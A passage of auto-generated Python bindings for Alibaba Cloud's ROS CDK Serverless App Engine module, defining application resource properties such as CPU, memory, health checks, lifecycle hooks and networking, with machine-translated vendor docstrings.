@jsii.member(jsii_name="appName")
def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: appName: Application Name. Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "appName"))
@app_name.setter
def app_name(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "appName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cpu")
def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: cpu: Each instance of the CPU required, in units of milli core, can not be zero. Currently only supports fixed specifications instance type.
'''
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "cpu"))
@cpu.setter
def cpu(self, value: typing.Union[jsii.Number, ros_cdk_core.IResolvable]) -> None:
jsii.set(self, "cpu", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="memory")
def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: memory: Each instance of the required memory, in units of MB, can not be zero. Currently only supports fixed specifications instance type.
'''
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "memory"))
@memory.setter
def memory(
self,
value: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "memory", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="namespaceId")
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property:
namespaceId: EDAS namespace corresponding to ID. Canada supports only the name of the scribe lowercase namespace must begin with a letter.
Namespace can interface to obtain from DescribeNamespaceList.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "namespaceId"))
@namespace_id.setter
def namespace_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "namespaceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="packageType")
def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: packageType: Application package type. Support FatJar, War, Image.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "packageType"))
@package_type.setter
def package_type(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "packageType", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="replicas")
def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: replicas: The initial number of instances.
'''
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], jsii.get(self, "replicas"))
@replicas.setter
def replicas(
self,
value: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "replicas", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="appDescription")
def app_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: appDescription: Application description. No more than 1024 characters.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "appDescription"))
@app_description.setter
def app_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "appDescription", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="command")
def command(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: command: Mirroring the start command. The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "command"))
@command.setter
def command(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "command", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="commandArgs")
def command_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: commandArgs: Mirroring the start command parameters. Parameters required for the start-command. For example: [ "1d"]
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "commandArgs"))
@command_args.setter
def command_args(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "commandArgs", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="customHostAlias")
def custom_host_alias(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: customHostAlias: Custom mapping host vessel. For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "customHostAlias"))
@custom_host_alias.setter
def custom_host_alias(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "customHostAlias", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="deploy")
def deploy(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property: deploy: Whether deployed immediately take effect, the default is false.
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "deploy"))
@deploy.setter
def deploy(
self,
value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "deploy", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="edasContainerVersion")
def edas_container_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: edasContainerVersion: EDAS pandora runtime environment used by the application.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "edasContainerVersion"))
@edas_container_version.setter
def edas_container_version(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "edasContainerVersion", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="envs")
def envs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: envs: Container environment variable parameters. For example: [{ "name": "envtmp", "value": "0"}]
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "envs"))
@envs.setter
def envs(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "envs", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="imageUrl")
def image_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: imageUrl: Mirroring address. Image only type of application can be configured to mirror address.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "imageUrl"))
@image_url.setter
def image_url(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "imageUrl", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="jarStartArgs")
def jar_start_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
jarStartArgs: Jar package startup application parameters. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jarStartArgs"))
@jar_start_args.setter
def jar_start_args(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "jarStartArgs", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="jarStartOptions")
def jar_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
jarStartOptions: Jar start the application package option. Apply the default startup command: $ JAVA_HOME / bin / java $ JarStartOptions -jar $ CATALINA_OPTS "$ package_path"
$ JarStartArgs
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jarStartOptions"))
@jar_start_options.setter
def jar_start_options(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "jarStartOptions", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="jdk")
def jdk(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: jdk: Deployment of JDK version of the package depends on. Mirroring not supported.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "jdk"))
@jdk.setter
def jdk(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "jdk", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="liveness")
def liveness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: liveness: Container health check, health check fails container will be killed and recovery. Currently only supports mode command issued in the container. The columns: { "exec": { "command": [ "sleep", "5s"]}, "initialDelaySeconds": 10, "timeoutSeconds": 11}
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "liveness"))
@liveness.setter
def liveness(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "liveness", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="mountDesc")
def mount_desc(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: mountDesc: Mount Description
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "mountDesc"))
@mount_desc.setter
def mount_desc(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "mountDesc", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="mountHost")
def mount_host(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: mountHost: nas mount point in the application of vpc.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "mountHost"))
@mount_host.setter
def mount_host(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "mountHost", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="nasId")
def nas_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: nasId: Mount the NAS ID, you must be in the same region and cluster. It must be available to create a mount point limit, or switch on its mount point already in the VPC. If you do not fill, and there mountDescs field, the default will automatically purchase a NAS and mount it onto the switch within the VPC.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "nasId"))
@nas_id.setter
def nas_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "nasId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="packageUrl")
def package_url(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: packageUrl: Deployment packages address. Only FatJar War or the type of application can be configured to deploy packet address.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "packageUrl"))
@package_url.setter
def package_url(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "packageUrl", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="packageVersion")
def package_version(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: packageVersion: The version number of the deployed package, War FatJar type required. Please customize it meaning.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "packageVersion"))
@package_version.setter
def package_version(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "packageVersion", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="postStart")
def post_start(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: postStart: Executing the script, such as after starting the format: { "exec": { "command": "cat", "/ etc / group"}}
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "postStart"))
@post_start.setter
def post_start(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "postStart", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="preStop")
def pre_stop(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: preStop: Script is executed before stopping the format as: { "exec": { "command": "cat", "/ etc / group"}}
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "preStop"))
@pre_stop.setter
def pre_stop(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "preStop", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="readiness")
def readiness(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: readiness: Application launch status check, health check fails repeatedly container will be killed and restarted. Do not pass health check of the vessel will not have to enter SLB traffic. For example: { "exec": { "command": [ "sleep", "6s"]}, "initialDelaySeconds": 15, "timeoutSeconds": 12}
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "readiness"))
@readiness.setter
def readiness(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "readiness", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="securityGroupId")
def security_group_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: securityGroupId: Security group ID.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "securityGroupId"))
@security_group_id.setter
def security_group_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "securityGroupId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="slsConfigs")
def sls_configs(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: slsConfigs: Log collection configuration file
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "slsConfigs"))
@sls_configs.setter
def sls_configs(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "slsConfigs", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="tags")
def tags(self) -> typing.Optional[typing.List["RosApplication.TagsProperty"]]:
'''
:Property: tags: Tags to attach to application. Max support 20 tags to add during create application. Each tag with two properties Key and Value, and Key is required.
'''
return typing.cast(typing.Optional[typing.List["RosApplication.TagsProperty"]], jsii.get(self, "tags"))
@tags.setter
def tags(
self,
value: typing.Optional[typing.List["RosApplication.TagsProperty"]],
) -> None:
jsii.set(self, "tags", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="timezone")
def timezone(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: timezone: Application time zone. Default Asia/Shanghai.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "timezone"))
@timezone.setter
def timezone(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "timezone", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcId")
def vpc_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: vpcId: EDAS namespace corresponding VPC. In Serverless in a corresponding one of the VPC namespace only, and can not be modified. Serverless first created in the application name space will form a binding relationship. You may correspond to a plurality of namespaces VPC. Do not fill was VpcId namespace binding.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "vpcId"))
@vpc_id.setter
def vpc_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "vpcId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vSwitchId")
def v_switch_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: vSwitchId: Application examples where the elastic card virtual switch. The switch must be located above the VPC. The same switch with EDAS namespace binding relationship. Do not fill was VSwitchId namespace binding.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "vSwitchId"))
@v_switch_id.setter
def v_switch_id(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "vSwitchId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="warStartOptions")
def war_start_options(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:: " start
:Property: warStartOptions: War Start the application package option. Apply the default startup command: java $ JAVA_OPTS $ CATALINA_OPTS -Options org.apache.catalina.startup.Bootstrap "$
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "warStartOptions"))
@war_start_options.setter
def war_start_options(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "warStartOptions", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="webContainer")
def web_container(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: webContainer: Tomcat deployment of the package depends on the version. Mirroring not supported.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "webContainer"))
@web_container.setter
def web_container(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "webContainer", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.RosApplication.TagsProperty",
jsii_struct_bases=[],
name_mapping={"key": "key", "value": "value"},
)
class TagsProperty:
def __init__(
self,
*,
key: typing.Union[builtins.str, ros_cdk_core.IResolvable],
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''
:param key:
:param value:
'''
self._values: typing.Dict[str, typing.Any] = {
"key": key,
}
if value is not None:
self._values["value"] = value
@builtins.property
def key(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: key: undefined
'''
result = self._values.get("key")
assert result is not None, "Required property 'key' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def value(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: value: undefined
'''
result = self._values.get("value")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "TagsProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-sae.RosApplicationProps",
jsii_struct_bases=[],
name_mapping={
"app_name": "appName",
"cpu": "cpu",
"memory": "memory",
"namespace_id": "namespaceId",
"package_type": "packageType",
"replicas": "replicas",
"app_description": "appDescription",
"command": "command",
"command_args": "commandArgs",
"custom_host_alias": "customHostAlias",
"deploy": "deploy",
"edas_container_version": "edasContainerVersion",
"envs": "envs",
"image_url": "imageUrl",
"jar_start_args": "jarStartArgs",
"jar_start_options": "jarStartOptions",
"jdk": "jdk",
"liveness": "liveness",
"mount_desc": "mountDesc",
"mount_host": "mountHost",
"nas_id": "nasId",
"package_url": "packageUrl",
"package_version": "packageVersion",
"post_start": "postStart",
"pre_stop": "preStop",
"readiness": "readiness",
"security_group_id": "securityGroupId",
"sls_configs": "slsConfigs",
"tags": "tags",
"timezone": "timezone",
"vpc_id": "vpcId",
"v_switch_id": "vSwitchId",
"war_start_options": "warStartOptions",
"web_container": "webContainer",
},
)
class RosApplicationProps:
def __init__(
self,
*,
app_name: typing.Union[builtins.str, ros_cdk_core.IResolvable],
cpu: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
memory: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
namespace_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
package_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
replicas: typing.Union[jsii.Number, ros_cdk_core.IResolvable],
app_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
command: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
command_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
custom_host_alias: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
deploy: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
edas_container_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
envs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
image_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jar_start_args: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jar_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
jdk: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
liveness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
mount_desc: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
mount_host: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
nas_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
package_url: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
package_version: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
post_start: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
pre_stop: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
readiness: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
security_group_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
sls_configs: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
tags: typing.Optional[typing.Sequence[RosApplication.TagsProperty]] = None,
timezone: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
vpc_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
v_switch_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
war_start_options: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
web_container: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
) -> None:
'''Properties for defining a ``ALIYUN::SAE::Application``.
:param app_name:
:param cpu:
:param memory:
:param namespace_id:
:param package_type:
:param replicas:
:param app_description:
:param command:
:param command_args:
:param custom_host_alias:
:param deploy:
:param edas_container_version:
:param envs:
:param image_url:
:param jar_start_args:
:param jar_start_options:
:param jdk:
:param liveness:
:param mount_desc:
:param mount_host:
:param nas_id:
:param package_url:
:param package_version:
:param post_start:
:param pre_stop:
:param readiness:
:param security_group_id:
:param sls_configs:
:param tags:
:param timezone:
:param vpc_id:
:param v_switch_id:
:param war_start_options:
:param web_container:
'''
self._values: typing.Dict[str, typing.Any] = {
"app_name": app_name,
"cpu": cpu,
"memory": memory,
"namespace_id": namespace_id,
"package_type": package_type,
"replicas": replicas,
}
if app_description is not None:
self._values["app_description"] = app_description
if command is not None:
self._values["command"] = command
if command_args is not None:
self._values["command_args"] = command_args
if custom_host_alias is not None:
self._values["custom_host_alias"] = custom_host_alias
if deploy is not None:
self._values["deploy"] = deploy
if edas_container_version is not None:
self._values["edas_container_version"] = edas_container_version
if envs is not None:
self._values["envs"] = envs
if image_url is not None:
self._values["image_url"] = image_url
if jar_start_args is not None:
self._values["jar_start_args"] = jar_start_args
if jar_start_options is not None:
self._values["jar_start_options"] = jar_start_options
if jdk is not None:
self._values["jdk"] = jdk
if liveness is not None:
self._values["liveness"] = liveness
if mount_desc is not None:
self._values["mount_desc"] = mount_desc
if mount_host is not None:
self._values["mount_host"] = mount_host
if nas_id is not None:
self._values["nas_id"] = nas_id
if package_url is not None:
self._values["package_url"] = package_url
if package_version is not None:
self._values["package_version"] = package_version
if post_start is not None:
self._values["post_start"] = post_start
if pre_stop is not None:
self._values["pre_stop"] = pre_stop
if readiness is not None:
self._values["readiness"] = readiness
if security_group_id is not None:
self._values["security_group_id"] = security_group_id
if sls_configs is not None:
self._values["sls_configs"] = sls_configs
if tags is not None:
self._values["tags"] = tags
if timezone is not None:
self._values["timezone"] = timezone
if vpc_id is not None:
self._values["vpc_id"] = vpc_id
if v_switch_id is not None:
self._values["v_switch_id"] = v_switch_id
if war_start_options is not None:
self._values["war_start_options"] = war_start_options
if web_container is not None:
self._values["web_container"] = web_container
@builtins.property
def app_name(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: appName: Application Name. Allowed numbers, letters and underlined combinations thereof. We must begin with the letters, the maximum length of 36 characters.
'''
result = self._values.get("app_name")
assert result is not None, "Required property 'app_name' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def cpu(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: cpu: Each instance of the CPU required, in units of milli core, can not be zero. Currently only supports fixed specifications instance type.
'''
result = self._values.get("cpu")
assert result is not None, "Required property 'cpu' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def memory(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: memory: Each instance of the required memory, in units of MB, can not be zero. Currently only supports fixed specifications instance type.
'''
result = self._values.get("memory")
assert result is not None, "Required property 'memory' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def namespace_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property:
namespaceId: EDAS namespace corresponding to ID. Canada supports only the name of the scribe lowercase namespace must begin with a letter.
Namespace can interface to obtain from DescribeNamespaceList.
'''
result = self._values.get("namespace_id")
assert result is not None, "Required property 'namespace_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def package_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: packageType: Application package type. Support FatJar, War, Image.
'''
result = self._values.get("package_type")
assert result is not None, "Required property 'package_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def replicas(self) -> typing.Union[jsii.Number, ros_cdk_core.IResolvable]:
'''
:Property: replicas: The initial number of instances.
'''
result = self._values.get("replicas")
assert result is not None, "Required property 'replicas' is missing"
return typing.cast(typing.Union[jsii.Number, ros_cdk_core.IResolvable], result)
@builtins.property
def app_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: appDescription: Application description. No more than 1024 characters.
'''
result = self._values.get("app_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def command(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: command: Mirroring the start command. The command object in memory executable container must be. For example: sleep. This command will cause the image to set the original startup command failure.
'''
result = self._values.get("command")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def command_args(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: commandArgs: Mirroring the start command parameters. Parameters required for the start-command. For example: [ "1d"]
'''
result = self._values.get("command_args")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def custom_host_alias(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: customHostAlias: Custom mapping host vessel. For example: [{ "hostName": "samplehost", "ip": "127.0.0.1"}]
'''
result = self._values.get("custom_host_alias")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def deploy(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property: deploy: Whether deployed immediately take effect, the default is false.
